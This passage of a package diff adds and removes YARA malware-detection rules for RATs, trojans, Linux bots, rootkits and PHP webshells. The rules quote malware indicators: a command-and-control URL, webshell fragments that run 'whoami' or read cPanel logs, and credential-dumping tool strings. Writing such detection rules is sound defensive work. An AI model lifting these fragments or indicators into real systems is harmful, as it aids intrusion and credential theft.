+        $v1f = "DataIn"
+        $v1g = "UDPzSockets"
+        $v1h = {52 00 54 00 5F 00 52 00 43 00 44 00 41 00 54 00 41}
+
+        $v2a = "<URL>k__BackingField"
+        $v2b = "<RunHidden>k__BackingField"
+        $v2c = "DownloadAndExecute"
+        $v2d = "-CHECK & PING -n 2 127.0.0.1 & EXIT" wide
+        $v2e = "england.png" wide
+        $v2f = "Showed Messagebox" wide
+    condition:
+        all of ($v1*) or all of ($v2*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Xtreme.yar remnux-rules-0.0.4/yara/malware/Xtreme.yar
--- remnux-rules-0.0.3/yara/malware/Xtreme.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Xtreme.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,112 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Xtreme
+{
+    meta:
+        description = "Xtreme RAT"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $string1 = /(X)tremeKeylogger/ wide ascii
+        $string2 = /(X)tremeRAT/ wide ascii
+        $string3 = /(X)TREMEUPDATE/ wide ascii
+        $string4 = /(S)TUBXTREMEINJECTED/ wide ascii
+
+        $unit1 = /(U)nitConfigs/ wide ascii
+        $unit2 = /(U)nitGetServer/ wide ascii
+        $unit3 = /(U)nitKeylogger/ wide ascii
+        $unit4 = /(U)nitCryptString/ wide ascii
+        $unit5 = /(U)nitInstallServer/ wide ascii
+        $unit6 = /(U)nitInjectServer/ wide ascii
+        $unit7 = /(U)nitBinder/ wide ascii
+        $unit8 = /(U)nitInjectProcess/ wide ascii
+
+    condition:
+        5 of them
+}
+
+rule xtreme_rat : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="23/02/2013"
+		description="Xtreme RAT"
+	
+	strings:
+		$signature1={58 00 54 00 52 00 45 00 4D 00 45} /*X.T.R.E.M.E*/
+		
+	condition:
+		$signature1
+}
+
+rule XtremeRATCode : XtremeRAT Family 
+{
+    meta:
+        description = "XtremeRAT code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+    
+    strings:
+        // call; fstp st
+        $ = { E8 ?? ?? ?? ?? DD D8 }
+        // hiding string
+        $ = { C6 85 ?? ?? ?? ?? 4D C6 85 ?? ?? ?? ?? 70 C6 85 ?? ?? ?? ?? 64 C6 85 ?? ?? ?? ?? 62 C6 85 ?? ?? ?? ?? 6D }
+    
+    condition:
+        all of them
+}
+
+rule XtremeRATStrings : XtremeRAT Family
+{
+    meta:
+        description = "XtremeRAT Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    strings:
+        $ = "dqsaazere"
+        $ = "-GCCLIBCYGMING-EH-TDM1-SJLJ-GTHR-MINGW32"
+        
+    condition:
+       any of them
+}
+
+rule XtremeRAT : Family
+{
+    meta:
+        description = "XtremeRAT"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    condition:
+        XtremeRATCode or XtremeRATStrings
+}
+
+rule xtremrat : rat
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "Xtrem RAT v3.5"
+		date = "2012-07-12" 
+		version = "1.0" 
+		filetype = "memory"
+
+	strings:
+		$a = "XTREME" wide
+		$b = "XTREMEBINDER" wide
+		$c = "STARTSERVERBUFFER" wide
+		$d = "SOFTWARE\\XtremeRAT" wide
+		$e = "XTREMEUPDATE" wide
+		$f = "XtremeKeylogger" wide
+		$g = "myversion|3.5" wide
+		$h = "xtreme rat" wide nocase
+	condition:
+		2 of them
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/Yayih.yar remnux-rules-0.0.4/yara/malware/Yayih.yar
--- remnux-rules-0.0.3/yara/malware/Yayih.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Yayih.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule YayihCode : Yayih Family 
+{
+    meta:
+        description = "Yayih code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+    
+    strings:
+        //  encryption
+        $ = { 80 04 08 7A 03 C1 8B 45 FC 80 34 08 19 03 C1 41 3B 0A 7C E9 }
+    
+    condition:
+        any of them
+}
+
+rule YayihStrings : Yayih Family
+{
+    meta:
+        description = "Yayih Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+        
+    strings:
+        $ = "/bbs/info.asp"
+        $ = "\\msinfo.exe"
+        $ = "%s\\%srcs.pdf"
+        $ = "\\aumLib.ini"
+
+    condition:
+       any of them
+}
+
+rule Yayih : Family
+{
+    meta:
+        description = "Yayih"
+        author = "Seth Hardy"
+        last_modified = "2014-07-11"
+        
+    condition:
+        YayihCode or YayihStrings
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Zegost.yar remnux-rules-0.0.4/yara/malware/Zegost.yar
--- remnux-rules-0.0.3/yara/malware/Zegost.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Zegost.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Zegost : Trojan
+{
+	meta:
+		author="Kevin Falcoz"
+		date="10/06/2013"
+		description="Zegost Trojan"
+		
+	strings:
+		$signature1={39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D}
+		$signature2={00 BA DA 22 51 42 6F 6D 65 00}
+		
+	condition:
+		$signature1 and $signature2
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Zeus.yar remnux-rules-0.0.4/yara/malware/Zeus.yar
--- remnux-rules-0.0.3/yara/malware/Zeus.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Zeus.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Windows_Malware : Zeus_1134
+    {
+            meta:
+                    author = "Xylitol xylitol@malwareint.com"
+                    date = "2014-03-03"
+                    description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4"
+                    reference = "http://www.xylibox.com/2014/03/zeus-1134.html"
+                    
+            strings:
+                    $mz = {4D 5A}
+                    $protocol1 = "X_ID: "
+                    $protocol2 = "X_OS: "
+                    $protocol3 = "X_BV: "
+                    $stringR1 = "InitializeSecurityDescriptor"
+                    $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
+            condition:
+                    ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2))
+    }
diff -Nru remnux-rules-0.0.3/yara/malware/ZoxPNG.yar remnux-rules-0.0.4/yara/malware/ZoxPNG.yar
--- remnux-rules-0.0.3/yara/malware/ZoxPNG.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/ZoxPNG.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule zoxPNG_RAT
+{
+    meta:
+        Author      = "Novetta Advanced Research Group"
+        Date        = "2014/11/14"
+        Description = "ZoxPNG RAT, url inside"
+        Reference   = "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf"
+
+    strings: 
+        $url = "png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty=58"
+
+    condition: 
+        $url
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/Miancha.yara remnux-rules-0.0.4/yara/Miancha.yara
--- remnux-rules-0.0.3/yara/Miancha.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Miancha.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,40 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule Trojan_W32_Gh0stMiancha_1_0_0
-{
-    meta:
-        Author      = "Context Threat Intelligence"
-        Date        = "2014/01/27"
-        Description = "Bytes inside"
-        Reference   = "http://www.contextis.com/documents/30/TA10009_20140127_-_CTI_Threat_Advisory_-_The_Monju_Incident1.pdf"
-
-    strings:
-        $0x = { 57 5b 5a 5a 51 57 40 34 31 67 2e 31 70 34 5c 40 40 44 3b 25 3a 19 1e 5c 7b 67 60 2e 34 31 67 2e 31 70 19 1e 55 77 77 71 64 60 2e 34 3e 3b 3e 19 1e 57 7b 7a 60 71 7a 60 39 40 6d 64 71 2e 34 60 71 6c 60 3b 7c 60 79 78 19 1e 44 66 7b 6c 6d 39 57 7b 7a 7a 71 77 60 7d 7b 7a 2e 34 5f 71 71 64 39 55 78 7d 62 71 19 1e 57 7b 7a 60 71 7a 60 39 78 71 7a 73 60 7c 2e 34 24 19 1e 19 1e }
-        $1 = { 5c e7 99 bd e5 8a a0 e9 bb 91 5c }
-        $1x = { 48 f3 8d a9 f1 9e b4 fd af 85 48 }
-        $2 = "DllCanLoadNow"
-        $2x = { 50 78 78 57 75 7a 58 7b 75 70 5a 7b 63 }
-        $3x = { 5a 61 79 76 71 66 34 7b 72 34 67 61 76 7f 71 6d 67 2e 34 31 70 } 
-        $4 = "JXNcc2hlbGxcb3Blblxjb21tYW5k"
-        $4x = { 5e 4c 5a 77 77 26 7c 78 76 53 6c 77 76 27 56 78 76 78 6c 7e 76 26 25 60 4d 43 21 7f }
-        $5 = "SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA=="
-        $5x = { 47 51 52 47 46 52 70 56 41 7f 42 77 46 51 42 40 45 25 5e 5e 41 52 46 5e 40 24 21 77 41 27 78 6e 70 53 42 60 4c 51 5a 78 76 7a 46 6d 4d 43 6c 45 77 79 2d 7e 4e 4c 5a 6e 76 27 5e 77 59 55 29 29 }
-        $6 = "C:\\Users\\why\\"
-        $6x = { 57 2e 48 41 67 71 66 67 48 63 7c 6d 48 }
-        $7 = "g:\\ykcx\\"
-        $7x = { 73 2E 48 6D 7F 77 6C 48 }
-        $8 = "(miansha)"
-        $8x = { 3C 79 7D 75 7A 67 7C 75 3D }
-        $9 = "server(\xE5\xA3\xB3)"
-        $9x = { 7C 2E 48 26 24 25 27 3A 25 25 3A 26 21 48 67 71 66 62 71 66 3C F1 B7 A7 3D 48 46 71 78 71 75 67 71 48 67 71 66 62 71 66 3A 64 70 76 }
-        $cfgDecode = { 8a ?? ?? 80 c2 7a 80 f2 19 88 ?? ?? 41 3b ce 7c ??}
-
-   condition:
-       any of them
-}
diff -Nru remnux-rules-0.0.3/yara/Miscelanea_Linux.yara remnux-rules-0.0.4/yara/Miscelanea_Linux.yara
--- remnux-rules-0.0.3/yara/Miscelanea_Linux.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Miscelanea_Linux.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,206 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule LinuxAESDDoS
-{
-    meta:
-	Author = "@benkow_"
-	Date = "2014/09/12"
-	Description = "Strings inside"
-        Reference = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
-
-    strings:
-        $a = "3AES"
-        $b = "Hacker"
-        $c = "VERSONEX"
-
-    condition:
-        2 of them
-}
-
-rule LinuxBillGates 
-{
-    meta:
-       Author      = "@benkow_"
-       Date        = "2014/08/11" 
-       Description = "Strings inside"
-       Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3429" 
-
-    strings:
-        $a= "12CUpdateGates"
-        $b= "11CUpdateBill"
-
-    condition:
-        $a and $b
-}
-
-rule LinuxElknot
-{
-    meta:
-	Author      = "@benkow_"
-        Date        = "2013/12/24" 
-        Description = "Strings inside"
-        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3099"
-
-    strings:
-        $a = "ZN8CUtility7DeCryptEPciPKci"
-	$b = "ZN13CThreadAttack5StartEP11CCmdMessage"
-
-    condition:
-	all of them
-}
-
-rule LinuxMrBlack
-{
-    meta:
-	Author      = "@benkow_"
-        Date        = "2014/09/12" 
-        Description = "Strings inside"
-        Reference   = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
-
-    strings:
-        $a = "Mr.Black"
-	$b = "VERS0NEX:%s|%d|%d|%s"
-    condition:
-        $a and $b
-}
-
-rule LinuxTsunami
-{
-    meta:
-	author = "@benkow_"
-        description = "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483"
-
-    strings:
-        $a = "PRIVMSG %s :[STD]Hitting %s"
-        $b = "NOTICE %s :TSUNAMI <target> <secs>"
-        $c = "NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually."
-    condition:
-        $a or $b or $c
-}
-
-rule rootkit
-{
-	meta:
-                author="xorseed"
-                reference= "https://stuff.rop.io/"
-	strings:
-		$sys1 = "sys_write" nocase ascii wide	
-		$sys2 = "sys_getdents" nocase ascii wide
-		$sys3 = "sys_getdents64" nocase ascii wide
-		$sys4 = "sys_getpgid" nocase ascii wide
-		$sys5 = "sys_getsid" nocase ascii wide
-		$sys6 = "sys_setpgid" nocase ascii wide
-		$sys7 = "sys_kill" nocase ascii wide
-		$sys8 = "sys_tgkill" nocase ascii wide
-		$sys9 = "sys_tkill" nocase ascii wide
-		$sys10 = "sys_sched_setscheduler" nocase ascii wide
-		$sys11 = "sys_sched_setparam" nocase ascii wide
-		$sys12 = "sys_sched_getscheduler" nocase ascii wide
-		$sys13 = "sys_sched_getparam" nocase ascii wide
-		$sys14 = "sys_sched_setaffinity" nocase ascii wide
-		$sys15 = "sys_sched_getaffinity" nocase ascii wide
-		$sys16 = "sys_sched_rr_get_interval" nocase ascii wide
-		$sys17 = "sys_wait4" nocase ascii wide
-		$sys18 = "sys_waitid" nocase ascii wide
-		$sys19 = "sys_rt_tgsigqueueinfo" nocase ascii wide
-		$sys20 = "sys_rt_sigqueueinfo" nocase ascii wide
-		$sys21 = "sys_prlimit64" nocase ascii wide
-		$sys22 = "sys_ptrace" nocase ascii wide
-		$sys23 = "sys_migrate_pages" nocase ascii wide
-		$sys24 = "sys_move_pages" nocase ascii wide
-		$sys25 = "sys_get_robust_list" nocase ascii wide
-		$sys26 = "sys_perf_event_open" nocase ascii wide
-		$sys27 = "sys_uname" nocase ascii wide
-		$sys28 = "sys_unlink" nocase ascii wide
-		$sys29 = "sys_unlikat" nocase ascii wide
-		$sys30 = "sys_rename" nocase ascii wide
-		$sys31 = "sys_read" nocase ascii wide
-		$sys32 = "kobject_del" nocase ascii wide
-		$sys33 = "list_del_init" nocase ascii wide
-		$sys34 = "inet_ioctl" nocase ascii wide
-	condition:
-		9 of them
-}
-
-rule exploit
-{
-        meta:
-                author="xorseed"
-                reference= "https://stuff.rop.io/"
-	strings:
-		$xpl1 = "set_fs_root" nocase ascii wide
-		$xpl2 = "set_fs_pwd" nocase ascii wide
-		$xpl3 = "__virt_addr_valid" nocase ascii wide
-		$xpl4 = "init_task" nocase ascii wide
-		$xpl5 = "init_fs" nocase ascii wide
-		$xpl6 = "bad_file_ops" nocase ascii wide
-		$xpl7 = "bad_file_aio_read" nocase ascii wide
-		$xpl8 = "security_ops" nocase ascii wide
-		$xpl9 = "default_security_ops" nocase ascii wide
-		$xpl10 = "audit_enabled" nocase ascii wide
-		$xpl11 = "commit_creds" nocase ascii wide
-		$xpl12 = "prepare_kernel_cred" nocase ascii wide
-		$xpl13 = "ptmx_fops" nocase ascii wide
-		$xpl14 = "node_states" nocase ascii wide
-	condition:
-		7 of them
-}
-
-rule ldpreload
-{
-        meta:
-                author="xorseed"
-                reference= "https://stuff.rop.io/"
-	strings:
-		$a = "dlopen" nocase ascii wide
-		$b = "dlsym" nocase ascii wide
-		$c = "fopen" nocase ascii wide
-		$d = "fopen64" nocase ascii wide
-		$e = "__fxstat" nocase ascii wide
-		$f = "__fxstat64" nocase ascii wide
-		$g = "accept" nocase ascii wide
-		$h = "__lxstat" nocase ascii wide
-		$i = "__lxstat64" nocase ascii wide
-		$j = "open" nocase ascii wide
-		$k = "rmdir" nocase ascii wide
-		$l = "__xstat" nocase ascii wide
-		$m = "__xstat64" nocase ascii wide
-		$n = "unlink" nocase ascii wide
-		$o = "unlikat" nocase ascii wide
-		$p = "fdopendir" nocase ascii wide
-		$q = "opendir" nocase ascii wide
-		$r = "readdir" nocase ascii wide
-		$s = "readdir64" nocase ascii wide
-	condition:
-		($a or $b) and 5 of them
-}
-
-rule keylogger
-{
-        meta:
-                author="xorseed"
-                reference="https://stuff.rop.io/"
-	strings:
-		$a = "XListInputDevices" ascii wide
-		$b = "XOpenDevice" ascii wide
-		$c = "XOpenIM" ascii wide
-		$d = "XGetIMValues" ascii wide
-		$e = "XmbLookupString" ascii wide
-		$f = "XFree" ascii wide
-		$g = "XCreateIC" ascii wide
-		$h = "XOpenDisplay" ascii wide
-		$i = "XNextEvent" ascii wide
-		$j = "XInternAtom" ascii wide
-		$k = "XSelectExtensionEvent" ascii wide
-		$l = "XFreeDeviceList" ascii wide
-		$m = "XGetWindowProperty" ascii wide
-		$n = "XkbKeycodeToKeysym" ascii wide
-	condition:
-		all of them
-}
diff -Nru remnux-rules-0.0.3/yara/Miscelanea_RTF.yara remnux-rules-0.0.4/yara/Miscelanea_RTF.yara
--- remnux-rules-0.0.3/yara/Miscelanea_RTF.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Miscelanea_RTF.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,25 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-
-rule rtf_multiple
-{
-meta:
-	author = "@patrickrolsen"
-	maltype = "Multiple"
-	version = "0.1"
-	reference = "fd69a799e21ccb308531ce6056944842" 
-	date = "01/04/2014"
-strings:
-	$rtf = { 7b 5c 72 74 ?? ?? } // {\rt01 {\rtf1 {\rtxa
-    	$string1  = "author user"
-	$string2   = "title Vjkygdjdtyuj" nocase
-	$string3    = "company ooo"
-	$string4  = "password 00000000"
-condition:
-    ($rtf at 0) and (all of ($string*))
-}
diff -Nru remnux-rules-0.0.3/yara/Miscelanea.yara remnux-rules-0.0.4/yara/Miscelanea.yara
--- remnux-rules-0.0.3/yara/Miscelanea.yara	2015-05-08 13:13:14.000000000 +0000
+++ remnux-rules-0.0.4/yara/Miscelanea.yara	1970-01-01 00:00:00.000000000 +0000
@@ -1,617 +0,0 @@
-/*
-    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
-
-*/
-
-import "pe"
-
-rule tran_duy_linh
-{
-meta:
-	author = "@patrickrolsen"
-	maltype = "Misc."
-	version = "0.2"
-	reference = "8fa804105b1e514e1998e543cd2ca4ea, 872876cfc9c1535cd2a5977568716ae1, etc." 
-	date = "01/03/2014"
-strings:
-	$doc = {D0 CF 11 E0} //DOCFILE0
-	$string1 = "Tran Duy Linh" fullword
-	$string2 = "DLC Corporation" fullword
-condition:
-    ($doc at 0) and (all of ($string*))
-}
-
-rule misc_iocs
-{
-meta:
-	author = "@patrickrolsen"
-	maltype = "Misc."
-	version = "0.1"
-	reference = "N/A" 
-strings:
-	$doc = {D0 CF 11 E0} //DOCFILE0
-	$s1 = "dw20.exe"
-	$s2 = "cmd /"
-condition:
-    ($doc at 0) and (1 of ($s*))
-}
-
-rule malicious_LNK_files
-{
-meta:
-	author = "@patrickrolsen"
-strings:
-	$magic = {4C 00 00 00 01 14 02 00} // L.......
-	$s1 = "\\RECYCLER\\" wide
-	$s2 = "%temp%" wide
-	$s3 = "%systemroot%\\system32\\cmd.exe" wide
-	//$s4 = "./start" wide
-	$s5 = "svchost.exe" wide
-	$s6 = "lsass.exe" wide
-	$s7 = "csrss.exe" wide
-	$s8 = "winlogon.exe" wide
-	//$s9 = "%cd%" wide
-	$s10 = "%appdata%" wide
-	$s11 = "%programdata%" wide
-	$s12 = "%localappdata%" wide
-	$s13 = ".cpl" wide
-condition:
-	($magic at 0) and any of ($s*)
-}
-
-rule memory_pivy
-
-{
-   meta:
-	  author = "https://github.com/jackcr/"
-   strings:
-      $a = {00 00 00 00 00 00 00 00 00 00 00 53 74 75 62 50 61 74 68 00} // presence of pivy in memory
-
-   condition: 
-      any of them
-
-}
-
-rule memory_shylock
-
-{
-   meta:
-	  author = "https://github.com/jackcr/"
-
-   strings:
-      $a = /pipe\\[A-F0-9]{32}/     //Named pipe created by the malware
-      $b = /id=[A-F0-9]{32}/     //Portion or the uri beacon
-      $c = /MASTER_[A-F0-9]{32}/     //Mutex created by the malware
-      $d = "***Load injects by PIPE (%s)" //String found in binary
-      $e = "***Load injects url=%s (%s)" //String found in binary
-      $f = "*********************** Ping Ok ************************" //String found in binary
-      $g = "*** LOG INJECTS *** %s"     //String found in binary
-
-   condition: 
-      any of them
-
-}
-
-rule RookieStrings : Rookie Family
-{
-    meta:
-        description = "Rookie Identifying Strings"
-        author = "Seth Hardy"
-        last_modified = "2014-06-25"
-        
-    strings:
-        $ = "RookIE/1.0"
-        
-    condition:
-       any of them
-}
-
-rule ScanBox_Malware_Generic {
-	meta:
-		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
-		author = "Florian Roth"
-		reference1 = "http://goo.gl/MUUfjv"
-		reference2 = "http://goo.gl/WXUQcP"
-		date = "2015/02/28"
-		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
-		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
-		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
-	strings:
-		/* Sample 1 */
-		$s0 = "http://142.91.76.134/p.dat" fullword ascii
-		$s1 = "HttpDump 1.1" fullword ascii
-		
-		/* Sample 2 */
-		$s3 = "SecureInput .exe" fullword wide
-		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
-		
-		/* Sample 3 */
-		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
-		$s6 = "ServiceMaix" fullword ascii		
-		
-		/* Certificate and Keywords */
-		$x1 = "Management Support Team1" fullword ascii
-		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
-		$s3 = "SEOUL1" fullword ascii
-	condition:
-		( 1 of ($s*) and 2 of ($x*) ) or 
-		( 3 of ($x*) )
-}
-
-rule TrojanDownloader {
-	meta:
-		description = "Trojan Downloader - Flash Exploit Feb15"
-		author = "Florian Roth"
-		reference = "http://goo.gl/wJ8V1I"
-		date = "2015/02/11"
-		hash = "5b8d4280ff6fc9c8e1b9593cbaeb04a29e64a81e"
-		score = 60
-	strings:
-		$x1 = "Hello World!" fullword ascii
-		$x2 = "CONIN$" fullword ascii
-			
-		$s6 = "GetCommandLineA" fullword ascii
-		$s7 = "ExitProcess" fullword ascii
-		$s8 = "CreateFileA" fullword ascii						
-
-		$s5 = "SetConsoleMode" fullword ascii		
-		$s9 = "TerminateProcess" fullword ascii	
-		$s10 = "GetCurrentProcess" fullword ascii
-		$s11 = "UnhandledExceptionFilter" fullword ascii
-		$s3 = "user32.dll" fullword ascii
-		$s16 = "GetEnvironmentStrings" fullword ascii
-		$s2 = "GetLastActivePopup" fullword ascii		
-		$s17 = "GetFileType" fullword ascii
-		$s19 = "HeapCreate" fullword ascii
-		$s20 = "VirtualFree" fullword ascii
-		$s21 = "WriteFile" fullword ascii
-		$s22 = "GetOEMCP" fullword ascii
-		$s23 = "VirtualAlloc" fullword ascii
-		$s24 = "GetProcAddress" fullword ascii
-		$s26 = "FlushFileBuffers" fullword ascii
-		$s27 = "SetStdHandle" fullword ascii
-		$s28 = "KERNEL32.dll" fullword ascii
-	condition:
-		$x1 and $x2 and ( all of ($s*) ) and filesize < 35000
-}
-
-rule Embedded_EXE_Cloaking {
-        meta:
-                description = "Detects an embedded executable in a non-executable file"
-                author = "Florian Roth"
-                date = "2015/02/27"
-                score = 80
-        strings:
-                $noex_png = { 89 50 4E 47 }
-                $noex_pdf = { 25 50 44 46 }
-                $noex_rtf = { 7B 5C 72 74 66 31 }
-                $noex_jpg = { FF D8 FF E0 }
-                $noex_gif = { 47 49 46 38 }
-                $mz  = { 4D 5A }
-                $a1 = "This program cannot be run in DOS mode"
-                $a2 = "This program must be run under Win32"
-        condition:
-                (
-                        ( $noex_png at 0 ) or
-                        ( $noex_pdf at 0 ) or
-                        ( $noex_rtf at 0 ) or
-                        ( $noex_jpg at 0 ) or
-                        ( $noex_gif at 0 )
-                )
-                and
-                for any i in (1..#mz): ( @a1 < ( @mz[i] + 200 ) or @a2 < ( @mz[i] + 200 ) )
-}
-
-rule Cloaked_as_JPG {
-        meta:
-                description = "Detects a cloaked file as JPG"
-                author = "Florian Roth (eval section from Didier Stevens)"
-                date = "2015/02/29"
-                score = 70
-        strings:
-                $ext = "extension: .jpg"
-        condition:
-                $ext and uint16be(0x00) != 0xFFD8
-}
-
-rule WindowsCredentialEditor
-{
-    meta: 
-    	description = "Windows Credential Editor" threat_level = 10 score = 90
-    strings:
-		$a = "extract the TGT session key"
-		$b = "Windows Credentials Editor"
-    condition: 
-    	$a or $b
-}
-
-rule Amplia_Security_Tool
-{
-    meta: 
-		description = "Amplia Security Tool" 
-		score = 60
-		nodeepdive = 1
-    strings:
-		$a = "Amplia Security"
-		$b = "Hernan Ochoa"
-		$c = "getlsasrvaddr.exe"
-		$d = "Cannot get PID of LSASS.EXE"
-		$e = "extract the TGT session key"
-		$f = "PPWDUMP_DATA"
-    condition: 1 of them
-}
-
-
-
-rule perlbot_pl {
-	meta:
-		description = "Semi-Auto-generated  - file perlbot.pl.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
-	strings:
-		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
-		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
-	condition:
-		1 of them
-}
-rule php_backdoor_php {
-	meta:
-		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
-	strings:
-		$s0 = "http://michaeldaw.org   2006"
-		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
-		$s3 = "coded by z0mbie"
-	condition:
-		1 of them
-}
-rule Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php {
-	meta:
-		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
-	strings:
-		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
-		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
-		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
-	condition:
-		1 of them
-}
-rule Nshell__1__php_php {
-	meta:
-		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "973fc89694097a41e684b43a21b1b099"
-	strings:
-		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
-		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
-	condition:
-		1 of them
-}
-rule shankar_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file shankar.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
-	strings:
-		$sAuthor = "ShAnKaR"
-		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
-		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
-	condition:
-		1 of ($s*) and $sAuthor
-}
-rule Casus15_php_php {
-	meta:
-		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
-		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
-	strings:
